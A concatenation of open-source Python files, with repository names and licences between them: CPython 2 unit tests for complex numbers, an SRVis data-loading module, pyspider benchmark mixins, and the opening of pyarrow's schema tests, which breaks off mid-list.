import unittest from test import test_support from random import random from math import atan2, isnan, copysign INF = float("inf") NAN = float("nan") # These tests ensure that complex math does the right thing class ComplexTest(unittest.TestCase): def assertAlmostEqual(self, a, b): if isinstance(a, complex): if isinstance(b, complex): unittest.TestCase.assertAlmostEqual(self, a.real, b.real) unittest.TestCase.assertAlmostEqual(self, a.imag, b.imag) else: unittest.TestCase.assertAlmostEqual(self, a.real, b) unittest.TestCase.assertAlmostEqual(self, a.imag, 0.) else: if isinstance(b, complex): unittest.TestCase.assertAlmostEqual(self, a, b.real) unittest.TestCase.assertAlmostEqual(self, 0., b.imag) else: unittest.TestCase.assertAlmostEqual(self, a, b) def assertCloseAbs(self, x, y, eps=1e-9): """Return true iff floats x and y "are close\"""" # put the one with larger magnitude second if abs(x) > abs(y): x, y = y, x if y == 0: return abs(x) < eps if x == 0: return abs(y) < eps # check that relative difference < eps self.assertTrue(abs((x-y)/y) < eps) def assertFloatsAreIdentical(self, x, y): """assert that floats x and y are identical, in the sense that: (1) both x and y are nans, or (2) both x and y are infinities, with the same sign, or (3) both x and y are zeros, with the same sign, or (4) x and y are both finite and nonzero, and x == y """ msg = 'floats {!r} and {!r} are not identical' if isnan(x) or isnan(y): if isnan(x) and isnan(y): return elif x == y: if x != 0.0: return # both zero; check that signs match elif copysign(1.0, x) == copysign(1.0, y): return else: msg += ': zeros have different signs' self.fail(msg.format(x, y)) def assertClose(self, x, y, eps=1e-9): """Return true iff complexes x and y "are close\"""" self.assertCloseAbs(x.real, y.real, eps) self.assertCloseAbs(x.imag, y.imag, eps) def check_div(self, x, y): """Compute complex z=x*y, and check that z/x==y and z/y==x.""" z = x * y if x != 0: q = z / x self.assertClose(q, y) q = z.__div__(x) self.assertClose(q, y) q = z.__truediv__(x) self.assertClose(q, y) if y != 0: q = z / y self.assertClose(q, x) q = z.__div__(y) self.assertClose(q, x) q = z.__truediv__(y) self.assertClose(q, x) def test_div(self): simple_real = [float(i) for i in xrange(-5, 6)] simple_complex = [complex(x, y) for x in simple_real for y in simple_real] for x in simple_complex: for y in simple_complex: self.check_div(x, y) # A naive complex division algorithm (such as in 2.0) is very prone to # nonsense errors for these (overflows and underflows). self.check_div(complex(1e200, 1e200), 1+0j) self.check_div(complex(1e-200, 1e-200), 1+0j) # Just for fun. for i in xrange(100): self.check_div(complex(random(), random()), complex(random(), random())) self.assertRaises(ZeroDivisionError, complex.__div__, 1+1j, 0+0j) # FIXME: The following currently crashes on Alpha # self.assertRaises(OverflowError, pow, 1e200+1j, 1e200+1j) def test_truediv(self): self.assertAlmostEqual(complex.__truediv__(2+0j, 1+1j), 1-1j) self.assertRaises(ZeroDivisionError, complex.__truediv__, 1+1j, 0+0j) def test_floordiv(self): self.assertAlmostEqual(complex.__floordiv__(3+0j, 1.5+0j), 2) self.assertRaises(ZeroDivisionError, complex.__floordiv__, 3+0j, 0+0j) def test_coerce(self): self.assertRaises(OverflowError, complex.__coerce__, 1+1j, 1L<<10000) def test_no_implicit_coerce(self): # Python 2.7 removed implicit coercion from the complex type class A(object): def __coerce__(self, other): raise RuntimeError __hash__ = None def __cmp__(self, other): return -1 a = A() self.assertRaises(TypeError, lambda: a + 2.0j) self.assertTrue(a < 2.0j) def test_richcompare(self): self.assertEqual(complex.__eq__(1+1j, 1L<<10000), False) self.assertEqual(complex.__lt__(1+1j, None), NotImplemented) self.assertIs(complex.__eq__(1+1j, 1+1j), True) self.assertIs(complex.__eq__(1+1j, 2+2j), False) self.assertIs(complex.__ne__(1+1j, 1+1j), False) self.assertIs(complex.__ne__(1+1j, 2+2j), True) self.assertRaises(TypeError, complex.__lt__, 1+1j, 2+2j) self.assertRaises(TypeError, complex.__le__, 1+1j, 2+2j) self.assertRaises(TypeError, complex.__gt__, 1+1j, 2+2j) self.assertRaises(TypeError, complex.__ge__, 1+1j, 2+2j) def test_richcompare_boundaries(self): def check(n, deltas, is_equal, imag = 0.0): for delta in deltas: i = n + delta z = complex(i, imag) self.assertIs(complex.__eq__(z, i), is_equal(delta)) self.assertIs(complex.__ne__(z, i), not is_equal(delta)) # For IEEE-754 doubles the following should hold: # x in [2 ** (52 + i), 2 ** (53 + i + 1)] -> x mod 2 ** i == 0 # where the interval is representable, of course. for i in range(1, 10): pow = 52 + i mult = 2 ** i check(2 ** pow, range(1, 101), lambda delta: delta % mult == 0) check(2 ** pow, range(1, 101), lambda delta: False, float(i)) check(2 ** 53, range(-100, 0), lambda delta: True) def test_mod(self): self.assertRaises(ZeroDivisionError, (1+1j).__mod__, 0+0j) a = 3.33+4.43j try: a % 0 except ZeroDivisionError: pass else: self.fail("modulo parama can't be 0") def test_divmod(self): self.assertRaises(ZeroDivisionError, divmod, 1+1j, 0+0j) def test_pow(self): self.assertAlmostEqual(pow(1+1j, 0+0j), 1.0) self.assertAlmostEqual(pow(0+0j, 2+0j), 0.0) self.assertRaises(ZeroDivisionError, pow, 0+0j, 1j) self.assertAlmostEqual(pow(1j, -1), 1/1j) self.assertAlmostEqual(pow(1j, 200), 1) self.assertRaises(ValueError, pow, 1+1j, 1+1j, 1+1j) a = 3.33+4.43j self.assertEqual(a ** 0j, 1) self.assertEqual(a ** 0.+0.j, 1) self.assertEqual(3j ** 0j, 1) self.assertEqual(3j ** 0, 1) try: 0j ** a except ZeroDivisionError: pass else: self.fail("should fail 0.0 to negative or complex power") try: 0j ** (3-2j) except ZeroDivisionError: pass else: self.fail("should fail 0.0 to negative or complex power") # The following is used to exercise certain code paths self.assertEqual(a ** 105, a ** 105) self.assertEqual(a ** -105, a ** -105) self.assertEqual(a ** -30, a ** -30) self.assertEqual(0.0j ** 0, 1) b = 5.1+2.3j self.assertRaises(ValueError, pow, a, b, 0) def test_boolcontext(self): for i in xrange(100): self.assertTrue(complex(random() + 1e-6, random() + 1e-6)) self.assertTrue(not complex(0.0, 0.0)) def test_conjugate(self): self.assertClose(complex(5.3, 9.8).conjugate(), 5.3-9.8j) def test_constructor(self): class OS: def __init__(self, value): self.value = value def __complex__(self): return self.value class NS(object): def __init__(self, value): self.value = value def __complex__(self): return self.value self.assertEqual(complex(OS(1+10j)), 1+10j) self.assertEqual(complex(NS(1+10j)), 1+10j) self.assertRaises(TypeError, complex, OS(None)) self.assertRaises(TypeError, complex, NS(None)) self.assertAlmostEqual(complex("1+10j"), 1+10j) self.assertAlmostEqual(complex(10), 10+0j) self.assertAlmostEqual(complex(10.0), 10+0j) self.assertAlmostEqual(complex(10L), 10+0j) self.assertAlmostEqual(complex(10+0j), 10+0j) self.assertAlmostEqual(complex(1,10), 1+10j) self.assertAlmostEqual(complex(1,10L), 1+10j) self.assertAlmostEqual(complex(1,10.0), 1+10j) self.assertAlmostEqual(complex(1L,10), 1+10j) self.assertAlmostEqual(complex(1L,10L), 1+10j) self.assertAlmostEqual(complex(1L,10.0), 1+10j) self.assertAlmostEqual(complex(1.0,10), 1+10j) self.assertAlmostEqual(complex(1.0,10L), 1+10j) self.assertAlmostEqual(complex(1.0,10.0), 1+10j) self.assertAlmostEqual(complex(3.14+0j), 3.14+0j) self.assertAlmostEqual(complex(3.14), 3.14+0j) self.assertAlmostEqual(complex(314), 314.0+0j) self.assertAlmostEqual(complex(314L), 314.0+0j) self.assertAlmostEqual(complex(3.14+0j, 0j), 3.14+0j) self.assertAlmostEqual(complex(3.14, 0.0), 3.14+0j) self.assertAlmostEqual(complex(314, 0), 314.0+0j) self.assertAlmostEqual(complex(314L, 0L), 314.0+0j) self.assertAlmostEqual(complex(0j, 3.14j), -3.14+0j) self.assertAlmostEqual(complex(0.0, 3.14j), -3.14+0j) self.assertAlmostEqual(complex(0j, 3.14), 3.14j) self.assertAlmostEqual(complex(0.0, 3.14), 3.14j) self.assertAlmostEqual(complex("1"), 1+0j) self.assertAlmostEqual(complex("1j"), 1j) self.assertAlmostEqual(complex(), 0) self.assertAlmostEqual(complex("-1"), -1) self.assertAlmostEqual(complex("+1"), +1) self.assertAlmostEqual(complex("(1+2j)"), 1+2j) self.assertAlmostEqual(complex("(1.3+2.2j)"), 1.3+2.2j) self.assertAlmostEqual(complex("3.14+1J"), 3.14+1j) self.assertAlmostEqual(complex(" ( +3.14-6J )"), 3.14-6j) self.assertAlmostEqual(complex(" ( +3.14-J )"), 3.14-1j) self.assertAlmostEqual(complex(" ( +3.14+j )"), 3.14+1j) self.assertAlmostEqual(complex("J"), 1j) self.assertAlmostEqual(complex("( j )"), 1j) self.assertAlmostEqual(complex("+J"), 1j) self.assertAlmostEqual(complex("( -j)"), -1j) self.assertAlmostEqual(complex('1e-500'), 0.0 + 0.0j) self.assertAlmostEqual(complex('-1e-500j'), 0.0 - 0.0j) self.assertAlmostEqual(complex('-1e-500+1e-500j'), -0.0 + 0.0j) class complex2(complex): pass self.assertAlmostEqual(complex(complex2(1+1j)), 1+1j) self.assertAlmostEqual(complex(real=17, imag=23), 17+23j) self.assertAlmostEqual(complex(real=17+23j), 17+23j) self.assertAlmostEqual(complex(real=17+23j, imag=23), 17+46j) self.assertAlmostEqual(complex(real=1+2j, imag=3+4j), -3+5j) # check that the sign of a zero in the real or imaginary part # is preserved when constructing from two floats. (These checks # are harmless on systems without support for signed zeros.) def split_zeros(x): """Function that produces different results for 0. and -0.""" return atan2(x, -1.) self.assertEqual(split_zeros(complex(1., 0.).imag), split_zeros(0.)) self.assertEqual(split_zeros(complex(1., -0.).imag), split_zeros(-0.)) self.assertEqual(split_zeros(complex(0., 1.).real), split_zeros(0.)) self.assertEqual(split_zeros(complex(-0., 1.).real), split_zeros(-0.)) c = 3.14 + 1j self.assertTrue(complex(c) is c) del c self.assertRaises(TypeError, complex, "1", "1") self.assertRaises(TypeError, complex, 1, "1") if test_support.have_unicode: self.assertEqual(complex(unicode(" 3.14+J ")), 3.14+1j) # SF bug 543840: complex(string) accepts strings with \0 # Fixed in 2.3. self.assertRaises(ValueError, complex, '1+1j\0j') self.assertRaises(TypeError, int, 5+3j) self.assertRaises(TypeError, long, 5+3j) self.assertRaises(TypeError, float, 5+3j) self.assertRaises(ValueError, complex, "") self.assertRaises(TypeError, complex, None) self.assertRaises(ValueError, complex, "\0") self.assertRaises(ValueError, complex, "3\09") self.assertRaises(TypeError, complex, "1", "2") self.assertRaises(TypeError, complex, "1", 42) self.assertRaises(TypeError, complex, 1, "2") self.assertRaises(ValueError, complex, "1+") self.assertRaises(ValueError, complex, "1+1j+1j") self.assertRaises(ValueError, complex, "--") self.assertRaises(ValueError, complex, "(1+2j") self.assertRaises(ValueError, complex, "1+2j)") self.assertRaises(ValueError, complex, "1+(2j)") self.assertRaises(ValueError, complex, "(1+2j)123") if test_support.have_unicode: self.assertRaises(ValueError, complex, unicode("x")) self.assertRaises(ValueError, complex, "1j+2") self.assertRaises(ValueError, complex, "1e1ej") self.assertRaises(ValueError, complex, "1e++1ej") self.assertRaises(ValueError, complex, ")1+2j(") # the following three are accepted by Python 2.6 self.assertRaises(ValueError, complex, "1..1j") self.assertRaises(ValueError, complex, "1.11.1j") self.assertRaises(ValueError, complex, "1e1.1j") if test_support.have_unicode: # check that complex accepts long unicode strings self.assertEqual(type(complex(unicode("1"*500))), complex) class EvilExc(Exception): pass class evilcomplex: def __complex__(self): raise EvilExc self.assertRaises(EvilExc, complex, evilcomplex()) class float2: def __init__(self, value): self.value = value def __float__(self): return self.value self.assertAlmostEqual(complex(float2(42.)), 42) self.assertAlmostEqual(complex(real=float2(17.), imag=float2(23.)), 17+23j) self.assertRaises(TypeError, complex, float2(None)) class complex0(complex): """Test usage of __complex__() when inheriting from 'complex'""" def __complex__(self): return 42j class complex1(complex): """Test usage of __complex__() with a __new__() method""" def __new__(self, value=0j): return complex.__new__(self, 2*value) def __complex__(self): return self class complex2(complex): """Make sure that __complex__() calls fail if anything other than a complex is returned""" def __complex__(self): return None self.assertAlmostEqual(complex(complex0(1j)), 42j) self.assertAlmostEqual(complex(complex1(1j)), 2j) self.assertRaises(TypeError, complex, complex2(1j)) def test_subclass(self): class xcomplex(complex): def __add__(self,other): return xcomplex(complex(self) + other) __radd__ = __add__ def __sub__(self,other): return xcomplex(complex(self) + other) __rsub__ = __sub__ def __mul__(self,other): return xcomplex(complex(self) * other) __rmul__ = __mul__ def __div__(self,other): return xcomplex(complex(self) / other) def __rdiv__(self,other): return xcomplex(other / complex(self)) __truediv__ = __div__ __rtruediv__ = __rdiv__ def __floordiv__(self,other): return xcomplex(complex(self) // other) def __rfloordiv__(self,other): return xcomplex(other // complex(self)) def __pow__(self,other): return xcomplex(complex(self) ** other) def __rpow__(self,other): return xcomplex(other ** complex(self) ) def __mod__(self,other): return xcomplex(complex(self) % other) def __rmod__(self,other): return xcomplex(other % complex(self)) infix_binops = ('+', '-', '*', '**', '%', '//', '/') xcomplex_values = (xcomplex(1), xcomplex(123.0), xcomplex(-10+2j), xcomplex(3+187j), xcomplex(3-78j)) test_values = (1, 123.0, 10-19j, xcomplex(1+2j), xcomplex(1+87j), xcomplex(10+90j)) for op in infix_binops: for x in xcomplex_values: for y in test_values: a = 'x %s y' % op b = 'y %s x' % op self.assertTrue(type(eval(a)) is type(eval(b)) is xcomplex) def test_hash(self): for x in xrange(-30, 30): self.assertEqual(hash(x), hash(complex(x, 0))) x /= 3.0 # now check against floating point self.assertEqual(hash(x), hash(complex(x, 0.))) def test_abs(self): nums = [complex(x/3., y/7.) for x in xrange(-9,9) for y in xrange(-9,9)] for num in nums: self.assertAlmostEqual((num.real**2 + num.imag**2) ** 0.5, abs(num)) def test_repr(self): self.assertEqual(repr(1+6j), '(1+6j)') self.assertEqual(repr(1-6j), '(1-6j)') self.assertNotEqual(repr(-(1+0j)), '(-1+-0j)') self.assertEqual(1-6j,complex(repr(1-6j))) self.assertEqual(1+6j,complex(repr(1+6j))) self.assertEqual(-6j,complex(repr(-6j))) self.assertEqual(6j,complex(repr(6j))) self.assertEqual(repr(complex(1., INF)), "(1+infj)") self.assertEqual(repr(complex(1., -INF)), "(1-infj)") self.assertEqual(repr(complex(INF, 1)), "(inf+1j)") self.assertEqual(repr(complex(-INF, INF)), "(-inf+infj)") self.assertEqual(repr(complex(NAN, 1)), "(nan+1j)") self.assertEqual(repr(complex(1, NAN)), "(1+nanj)") self.assertEqual(repr(complex(NAN, NAN)), "(nan+nanj)") self.assertEqual(repr(complex(0, INF)), "infj") self.assertEqual(repr(complex(0, -INF)), "-infj") self.assertEqual(repr(complex(0, NAN)), "nanj") def test_neg(self): self.assertEqual(-(1+6j), -1-6j) def test_file(self): a = 3.33+4.43j b = 5.1+2.3j fo = None try: fo = open(test_support.TESTFN, "wb") print >>fo, a, b fo.close() fo = open(test_support.TESTFN, "rb") self.assertEqual(fo.read(), "%s %s\n" % (a, b)) finally: if (fo is not None) and (not fo.closed): fo.close() test_support.unlink(test_support.TESTFN) def test_getnewargs(self): self.assertEqual((1+2j).__getnewargs__(), (1.0, 2.0)) self.assertEqual((1-2j).__getnewargs__(), (1.0, -2.0)) self.assertEqual((2j).__getnewargs__(), (0.0, 2.0)) self.assertEqual((-0j).__getnewargs__(), (0.0, -0.0)) self.assertEqual(complex(0, INF).__getnewargs__(), (0.0, INF)) self.assertEqual(complex(INF, 0).__getnewargs__(), (INF, 0.0)) if float.__getformat__("double").startswith("IEEE"): def test_plus_minus_0j(self): # test that -0j and 0j literals are not identified z1, z2 = 0j, -0j self.assertEqual(atan2(z1.imag, -1.), atan2(0., -1.)) self.assertEqual(atan2(z2.imag, -1.), atan2(-0., -1.)) @unittest.skipUnless(float.__getformat__("double").startswith("IEEE"), "test requires IEEE 754 doubles") def test_overflow(self): self.assertEqual(complex("1e500"), complex(INF, 0.0)) self.assertEqual(complex("-1e500j"), complex(0.0, -INF)) self.assertEqual(complex("-1e500+1.8e308j"), complex(-INF, INF)) @unittest.skipUnless(float.__getformat__("double").startswith("IEEE"), "test requires IEEE 754 doubles") def test_repr_roundtrip(self): vals = [0.0, 1e-500, 1e-315, 1e-200, 0.0123, 3.1415, 1e50, INF, NAN] vals += [-v for v in vals] # complex(repr(z)) should recover z exactly, even for complex # numbers involving an infinity, nan, or negative zero for x in vals: for y in vals: z = complex(x, y) roundtrip = complex(repr(z)) self.assertFloatsAreIdentical(z.real, roundtrip.real) self.assertFloatsAreIdentical(z.imag, roundtrip.imag) # if we predefine some constants, then eval(repr(z)) should # also work, except that it might change the sign of zeros inf, nan = float('inf'), float('nan') infj, nanj = complex(0.0, inf), complex(0.0, nan) for x in vals: for y in vals: z = complex(x, y) roundtrip = eval(repr(z)) # adding 0.0 has no effect beside changing -0.0 to 0.0 self.assertFloatsAreIdentical(0.0 + z.real, 0.0 + roundtrip.real) self.assertFloatsAreIdentical(0.0 + z.imag, 0.0 + roundtrip.imag) def test_format(self): # empty format string is same as str() self.assertEqual(format(1+3j, ''), str(1+3j)) self.assertEqual(format(1.5+3.5j, ''), str(1.5+3.5j)) self.assertEqual(format(3j, ''), str(3j)) self.assertEqual(format(3.2j, ''), str(3.2j)) self.assertEqual(format(3+0j, ''), str(3+0j)) self.assertEqual(format(3.2+0j, ''), str(3.2+0j)) # empty presentation type should still be analogous to str, # even when format string is nonempty (issue #5920). self.assertEqual(format(3.2+0j, '-'), str(3.2+0j)) self.assertEqual(format(3.2+0j, '<'), str(3.2+0j)) z = 4/7. - 100j/7. self.assertEqual(format(z, ''), str(z)) self.assertEqual(format(z, '-'), str(z)) self.assertEqual(format(z, '<'), str(z)) self.assertEqual(format(z, '10'), str(z)) z = complex(0.0, 3.0) self.assertEqual(format(z, ''), str(z)) self.assertEqual(format(z, '-'), str(z)) self.assertEqual(format(z, '<'), str(z)) self.assertEqual(format(z, '2'), str(z)) z = complex(-0.0, 2.0) self.assertEqual(format(z, ''), str(z)) self.assertEqual(format(z, '-'), str(z)) self.assertEqual(format(z, '<'), str(z)) self.assertEqual(format(z, '3'), str(z)) self.assertEqual(format(1+3j, 'g'), '1+3j') self.assertEqual(format(3j, 'g'), '0+3j') self.assertEqual(format(1.5+3.5j, 'g'), '1.5+3.5j') self.assertEqual(format(1.5+3.5j, '+g'), '+1.5+3.5j') self.assertEqual(format(1.5-3.5j, '+g'), '+1.5-3.5j') self.assertEqual(format(1.5-3.5j, '-g'), '1.5-3.5j') self.assertEqual(format(1.5+3.5j, ' g'), ' 1.5+3.5j') self.assertEqual(format(1.5-3.5j, ' g'), ' 1.5-3.5j') self.assertEqual(format(-1.5+3.5j, ' g'), '-1.5+3.5j') self.assertEqual(format(-1.5-3.5j, ' g'), '-1.5-3.5j') self.assertEqual(format(-1.5-3.5e-20j, 'g'), '-1.5-3.5e-20j') self.assertEqual(format(-1.5-3.5j, 'f'), '-1.500000-3.500000j') self.assertEqual(format(-1.5-3.5j, 'F'), '-1.500000-3.500000j') self.assertEqual(format(-1.5-3.5j, 'e'), '-1.500000e+00-3.500000e+00j') self.assertEqual(format(-1.5-3.5j, '.2e'), '-1.50e+00-3.50e+00j') self.assertEqual(format(-1.5-3.5j, '.2E'), '-1.50E+00-3.50E+00j') self.assertEqual(format(-1.5e10-3.5e5j, '.2G'), '-1.5E+10-3.5E+05j') self.assertEqual(format(1.5+3j, '<20g'), '1.5+3j ') self.assertEqual(format(1.5+3j, '*<20g'), '1.5+3j**************') self.assertEqual(format(1.5+3j, '>20g'), ' 1.5+3j') self.assertEqual(format(1.5+3j, '^20g'), ' 1.5+3j ') self.assertEqual(format(1.5+3j, '<20'), '(1.5+3j) ') self.assertEqual(format(1.5+3j, '>20'), ' (1.5+3j)') self.assertEqual(format(1.5+3j, '^20'), ' (1.5+3j) ') self.assertEqual(format(1.123-3.123j, '^20.2'), ' (1.1-3.1j) ') self.assertEqual(format(1.5+3j, '20.2f'), ' 1.50+3.00j') self.assertEqual(format(1.5+3j, '>20.2f'), ' 1.50+3.00j') self.assertEqual(format(1.5+3j, '<20.2f'), '1.50+3.00j ') self.assertEqual(format(1.5e20+3j, '<20.2f'), '150000000000000000000.00+3.00j') self.assertEqual(format(1.5e20+3j, '>40.2f'), ' 150000000000000000000.00+3.00j') self.assertEqual(format(1.5e20+3j, '^40,.2f'), ' 150,000,000,000,000,000,000.00+3.00j ') self.assertEqual(format(1.5e21+3j, '^40,.2f'), ' 1,500,000,000,000,000,000,000.00+3.00j ') self.assertEqual(format(1.5e21+3000j, ',.2f'), '1,500,000,000,000,000,000,000.00+3,000.00j') # alternate is invalid self.assertRaises(ValueError, (1.5+0.5j).__format__, '#f') # zero padding is invalid self.assertRaises(ValueError, (1.5+0.5j).__format__, '010f') # '=' alignment is invalid self.assertRaises(ValueError, (1.5+3j).__format__, '=20') # integer presentation types are an error for t in 'bcdoxX': self.assertRaises(ValueError, (1.5+0.5j).__format__, t) # make sure everything works in ''.format() self.assertEqual('*{0:.3f}*'.format(3.14159+2.71828j), '*3.142+2.718j*') # issue 3382: 'f' and 'F' with inf's and nan's self.assertEqual('{0:f}'.format(INF+0j), 'inf+0.000000j') self.assertEqual('{0:F}'.format(INF+0j), 'INF+0.000000j') self.assertEqual('{0:f}'.format(-INF+0j), '-inf+0.000000j') self.assertEqual('{0:F}'.format(-INF+0j), '-INF+0.000000j') self.assertEqual('{0:f}'.format(complex(INF, INF)), 'inf+infj') self.assertEqual('{0:F}'.format(complex(INF, INF)), 'INF+INFj') self.assertEqual('{0:f}'.format(complex(INF, -INF)), 'inf-infj') self.assertEqual('{0:F}'.format(complex(INF, -INF)), 'INF-INFj') self.assertEqual('{0:f}'.format(complex(-INF, INF)), '-inf+infj') self.assertEqual('{0:F}'.format(complex(-INF, INF)), '-INF+INFj') self.assertEqual('{0:f}'.format(complex(-INF, -INF)), '-inf-infj') self.assertEqual('{0:F}'.format(complex(-INF, -INF)), '-INF-INFj') self.assertEqual('{0:f}'.format(complex(NAN, 0)), 'nan+0.000000j') self.assertEqual('{0:F}'.format(complex(NAN, 0)), 'NAN+0.000000j') self.assertEqual('{0:f}'.format(complex(NAN, NAN)), 'nan+nanj') self.assertEqual('{0:F}'.format(complex(NAN, NAN)), 'NAN+NANj') def test_main(): with test_support.check_warnings(("complex divmod.., // and % are " "deprecated", DeprecationWarning)): test_support.run_unittest(ComplexTest) if __name__ == "__main__": test_main()
gpl-2.0
nberliner/SRVis
lib/dataHandler.py
1
3758
#!/usr/bin/env python # -*- coding: utf-8 -*- # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. """ SRVis Copyright (C) 2015 Niklas Berliner """ import sys import numpy as np import tifffile as Tiff from localisationClass import rapidstormLocalisations, XYTLocalisations #from visualiseLocalisations import QuadTree class dataHandler(): """ Interface between the data and the SRVis application The super-resolution data is stored in a pandas DataFrame and the TIFF image is read using tifffile.py (see http://www.lfd.uci.edu/~gohlke/code/tifffile.py.html) """ def __init__(self, fnameImage, fnameLocalisations, fnameLocalisationsType, pixelSize, CpPh): self.fnameLocalisations = fnameLocalisations self.fnameLocalisationsType = fnameLocalisationsType self.pixelSize = pixelSize self.CpPh = CpPh if fnameImage == None or fnameImage == '': self.image = None else: print 'Reading the image' self.image = Tiff.TiffFile(fnameImage) print 'Reading the localisations' self._loadLocalisations() def _loadLocalisations(self): # Here other localisation data types can be added if desired if self.fnameLocalisationsType == 'rapidstorm': self.data = rapidstormLocalisations() self.data.readFile(self.fnameLocalisations, photonConversion=self.CpPh, pixelSize=self.pixelSize) elif self.fnameLocalisationsType == 'xyt': self.data = XYTLocalisations() self.data.readFile(self.fnameLocalisations, pixelSize=self.pixelSize) else: print 'No localisation type is checked. Something went wrong..exiting' sys.exit() # Very ugly! Should be changed to a popup! def reloadData(self, dataType): if dataType == 'localisations': self._loadLocalisations() def getImage(self, frame): """ Returns the frame as np.array """ return self.image[frame].asarray() def maxImageFrame(self): """ Returns the number of frames """ if self.image == None: return 0 else: return len(self.image) def getLocalisations(self, frame): """ Return X and Y localisation data as numpy arrays that can be directly used in a matplotlib scatter plot """ data = self.data.localisations() xy = np.asarray(data[ data['frame'] == frame ][['x','y']]) return xy[:,0], xy[:,1] def filterData(self, filterValues): """ Filter the localisation data based on the filter conditions in filterValues. filterValues must be a dict with dataType that should be filtered as keys and the min and max values as values, i.e. e.g. filterValues = dict() filterValues['SNR'] = (20, None) """ self.data.filterAll(filterValues, relative=False) def saveLocalisations(self, fname, pxSize): """ Save the (filtered) localisations to disk """ self.data.writeToFile(fname, pixelSize=pxSize)
gpl-3.0
ubear/Pyspider
pyspider/libs/bench.py
6
2974
#!/usr/bin/env python # -*- encoding: utf-8 -*- # vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8: # Author: Binux<roy@binux.me> # http://binux.me # Created on 2014-12-08 22:23:10 import time import logging logger = logging.getLogger('bench') from pyspider.scheduler import Scheduler from pyspider.fetcher.tornado_fetcher import Fetcher from pyspider.processor import Processor from pyspider.result import ResultWorker class BenchMixin(object): """Report to logger for bench test""" def _bench_init(self): self.done_cnt = 0 self.start_time = time.time() self.last_cnt = 0 self.last_report = 0 def _bench_report(self, name, prefix=0, rjust=0): self.done_cnt += 1 now = time.time() if now - self.last_report >= 1: rps = float(self.done_cnt - self.last_cnt) / (now - self.last_report) output = '' if prefix: output += " " * prefix output += ("%s %s pages (at %d pages/min)" % ( name, self.done_cnt, rps * 60.0)).rjust(rjust) logger.info(output) self.last_cnt = self.done_cnt self.last_report = now class BenchScheduler(Scheduler, BenchMixin): def __init__(self, *args, **kwargs): super(BenchScheduler, self).__init__(*args, **kwargs) self._bench_init() def on_task_status(self, task): self._bench_report('Crawled') return super(BenchScheduler, self).on_task_status(task) class BenchFetcher(Fetcher, BenchMixin): def __init__(self, *args, **kwargs): super(BenchFetcher, self).__init__(*args, **kwargs) self._bench_init() def on_result(self, type, task, result): self._bench_report("Fetched", 0, 75) return super(BenchFetcher, self).on_result(type, task, result) class BenchProcessor(Processor, BenchMixin): def __init__(self, *args, **kwargs): super(BenchProcessor, self).__init__(*args, **kwargs) self._bench_init() def on_task(self, task, response): self._bench_report("Processed", 75) return super(BenchProcessor, self).on_task(task, response) class BenchResultWorker(ResultWorker, BenchMixin): def __init__(self, *args, **kwargs): super(BenchResultWorker, self).__init__(*args, **kwargs) self._bench_init() def on_result(self, task, result): self._bench_report("Saved", 0, 150) super(BenchResultWorker, self).on_result(task, result) bench_script = ''' from pyspider.libs.base_handler import * class Handler(BaseHandler): def on_start(self): self.crawl('http://127.0.0.1:5000/bench', params={'total': %(total)d, 'show': %(show)d}, callback=self.index_page) def index_page(self, response): for each in response.doc('a[href^="http://"]').items(): self.crawl(each.attr.href, callback=self.index_page) return response.url '''
apache-2.0
wesm/arrow
python/pyarrow/tests/test_schema.py
4
20872
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. from collections import OrderedDict import pickle import sys import weakref import pytest import numpy as np import pyarrow as pa import pyarrow.tests.util as test_util from pyarrow.vendored.version import Version def test_schema_constructor_errors(): msg = ("Do not call Schema's constructor directly, use `pyarrow.schema` " "instead") with pytest.raises(TypeError, match=msg): pa.Schema() def test_type_integers(): dtypes = ['int8', 'int16', 'int32', 'int64', 'uint8', 'uint16', 'uint32', 'uint64'] for name in dtypes: factory = getattr(pa, name) t = factory() assert str(t) == name def test_type_to_pandas_dtype(): M8_ns = np.dtype('datetime64[ns]') cases = [ (pa.null(), np.object_), (pa.bool_(), np.bool_), (pa.int8(), np.int8), (pa.int16(), np.int16), (pa.int32(), np.int32), (pa.int64(), np.int64), (pa.uint8(), np.uint8), (pa.uint16(), np.uint16), (pa.uint32(), np.uint32), (pa.uint64(), np.uint64), (pa.float16(), np.float16), (pa.float32(), np.float32), (pa.float64(), np.float64), (pa.date32(), M8_ns), (pa.date64(), M8_ns), (pa.timestamp('ms'), M8_ns), (pa.binary(), np.object_), (pa.binary(12), np.object_), (pa.string(), np.object_), (pa.list_(pa.int8()), np.object_), # (pa.list_(pa.int8(), 2), np.object_), # TODO needs pandas conversion (pa.map_(pa.int64(), pa.float64()), np.object_), ] for arrow_type, numpy_type in cases: assert arrow_type.to_pandas_dtype() == numpy_type @pytest.mark.pandas def test_type_to_pandas_dtype_check_import(): # ARROW-7980 test_util.invoke_script('arrow_7980.py') def test_type_list(): value_type = pa.int32() list_type = pa.list_(value_type) assert str(list_type) == 'list<item: int32>' field = pa.field('my_item', pa.string()) l2 = pa.list_(field) assert str(l2) == 'list<my_item: string>' def test_type_comparisons(): val = pa.int32() assert val == pa.int32() assert val == 'int32' assert val != 5 def test_type_for_alias(): cases = [ ('i1', pa.int8()), ('int8', pa.int8()), ('i2', pa.int16()), ('int16', pa.int16()), ('i4', pa.int32()), ('int32', pa.int32()), ('i8', pa.int64()), ('int64', pa.int64()), ('u1', pa.uint8()), ('uint8', pa.uint8()), ('u2', pa.uint16()), ('uint16', pa.uint16()), ('u4', pa.uint32()), ('uint32', pa.uint32()), ('u8', pa.uint64()), ('uint64', pa.uint64()), ('f4', pa.float32()), ('float32', pa.float32()), ('f8', pa.float64()), ('float64', pa.float64()), ('date32', pa.date32()), ('date64', pa.date64()), ('string', pa.string()), ('str', pa.string()), 